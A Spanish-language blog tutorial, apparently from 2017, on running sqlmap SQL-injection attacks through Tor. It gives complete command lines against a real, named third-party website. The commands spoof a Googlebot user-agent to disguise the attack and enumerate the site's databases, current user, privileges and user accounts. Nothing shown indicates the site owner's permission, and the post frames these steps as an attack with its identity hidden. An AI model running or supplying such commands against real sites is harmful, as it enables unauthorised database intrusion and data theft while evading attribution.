Bienvenidos de nuevo mis estimados lectores a mi mas noble post ; en esta ocasión les traigo la segunda parte de este pequeño tutorial que estoy desarrollando en lapso de semanas, esta vez les mostrare sobre el uso de tor y sqlmap juntos; tambien veremos a los user-agent y los random-agent entre otras cosas.
Si quieres ver el post anterior de este da clic aquí:
http://zorroprogramador.blogspot.com/2017/02/ataque-sql-injection-basico-con-sqlmap.html
VÍDEO INFORMATIVO:
TOR:
Es un proyecto cuyo objetivo principal es el desarrollo de una red de comunicaciones distribuida de baja latencia y superpuesta sobre Internet, en la que el encaminamiento de los mensajes intercambiados entre los usuarios no revela su identidad, es decir, su dirección IP (anonimato a nivel de red) y que, además, mantiene la integridad y el secreto de la información que viaja por ella.
para instalar tor en derivados de debían basta con escribir en la consola :
para instalar tor en derivados de debían basta con escribir en la consola :
~$ sudo apt-get install tor
Desde mi punto de vista el uso de tor para ocultar nuestra identidad no es conveniente ya que no es tan anónimo como se dice, eso lo hablare en post mas adelante y de otras opciones para esconder nuestra identidad.
TOR BROWSER:
Esta vez voy hacer uso de Tor browser es cual es un navegador de código abierto que esta preconfigurado para funcionar en la red tor y esta disponible para Linux, Mac y Windows. Si usas algún derivado de debían aquí te dejo mi pos anterior para instalarlo:
TUTORIAL:
1-iniciando tor:
Para iniciar tor basta con ir ala terminal e iniciar como super usuario :
escribimos tor
![]() |
| iniciando el super usuario |
Abrimos el tor browser y esperamos que se conecte a tor y ahí abrimos la pagina que vamos atacar.
![]() |
| tor browser iniciado |
![]() |
| pagina atacar |
NOTA: el uso de tor browser es opcional. Y la pagina que se ataco no se afecto..
2- Probando si la pagina es vulnerable de manera manual:
como vimos en post anterior primero comprobamos si la pagina a atacar es vulnerable la cual tendremos de preferencia abierta en tor browser recuerda que es opcional:
Para comprobar si es vulnerable o no la web a hackear, pondremos un apostrofe “ ‘ “ al final del link de la página que queremos vulnerar.
Al agregar el apostrofe y actualizar el link notamos el siguiente error:
Todo esto nos indica que esta página es vulnerable.
3- Comenzamos el ataque:
En este punto iniciamos sqlmap:
Para iniciar sqlmap en debían y sus derivados se inicia como súper usuario ( en mi caso yo uso back box como sistema de escritorio y ya trae instalado SQLmap).
A)-Abrimos una nueva consola y iniciamos como súper usuario e iniciamos sqlmap:
B)- Abrimos tor browser. Si no tenemos abierto tor browser ,lo abrimos y esperamos a que cargue:
C)-Una vez que cargue vamos ha verificar algo muy importante, el proxy que nos instala tor browser por defecto del cual hablare en un post mas adelante.
para hacerlo sigue estos pasos:
1.-Ir al menú el cual se encuentra en la esquina derecha de tor browser:
2-El paso anterior nos mostrara un menú en el buscamos la opción “preferences”
3-Nos mostrar un menú en el cual nos iremos a la opción “advanced” y luego damos clic en el botón “settings”.
4-Nos mostrar una ventana como la imagen y percatamos que esta seleccionada la opción Sockv5 y el puerto 9150; esto es lo que vamos utilizar en nuestro ataque.
D)-También podemos verificar lo anterior en la consola de tor que se mostro al principio pero ahí nos muestra otro puerto ya que el navegador usa el 9150 y el de la consola usa el 9050 cualquiera de los caso se puede usar cualquiera.
root@alucard:~# sqlmap -u http://www.bible-history.com/subcat.php?id=2--tor-type=SOCKS5 --tor-port=9150 --user-agent="Googlebot (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" --dbs
o
root@alucard:~#sqlmap -u http://www.bible-history.com/subcat.php?id=2 --tor --check-tor --tor-port=9050 --tor-type=SOCKS5 --user-agent="Googlebot (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"Donde:
--tor --> especificamos que vamos a usar tor
--check-tor -->User Tor Anonymity Network; Si está usando vidalia, entonces --
check-tor no es necesario, por que solo es para asegurar que estas usando tor.--tor-type--->Set Tor proxy type (HTTP (defacult ), SOCKS4 or SOCKS5)
--tor-port --> es el puerto por el cual trabaja tor este puede variar ...
--user-agent="Googlebot (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" --> este sirve para camuflar el ataque con un robot de google el cual sigue aun vigente , tambien se puede usar uno aleatorio con --radom-agent por ejmplo:
root@alucard:~#sqlmap -u http://www.bible-history.com/subcat.php?id=2 --tor --check-tor --tor-port=9050 --tor-type=SOCKS5 --random-agent --dbs
Algunas opciones avanzadas:
esta seccion les muestro algunas opciones avanzadas y para que sirven, en el video muestro algunas,en el siguiente post are uso de ellas y por que son importantes:
--current-user -->se usa para saber si el usuario que se esta inyectando,si es root o user, el comando quedaria asi:
root@alucard:~#sqlmap -u http://www.bible-history.com/subcat.php?id=2 --tor --check-tor --tor-port=9050 --tor-type=SOCKS5 --random-agent --current-user
--current-db-->Con este interruptor es posible recuperar el nombre de la base de datos del sistema de gestión de base de datos que la aplicación web está conectado. Es decir nos muestra la base ala que esta conectada la pagina; el comando quedaría así:
root@alucard:~#sqlmap -u http://www.bible-history.com/subcat.php?id=2 --tor --check-tor --tor-port=9050 --tor-type=SOCKS5 --random-agent –current-user --current-db
--privileges --> nos verifica los privilegios presentes en la base de datos
root@alucard:~#sqlmap -u http://www.bible-history.com/subcat.php?id=2 --tor --check-tor --tor-port=9050 --tor-type=SOCKS5 --random-agent –current-user --current-db --privileges--users --> nos permite enumerar los usuarios conectados a la base de datos
aquí les dejo una pagina para testiar la cual me vino en un libro: http://adf.ly/1lNfVd
















No hay comentarios:
Publicar un comentario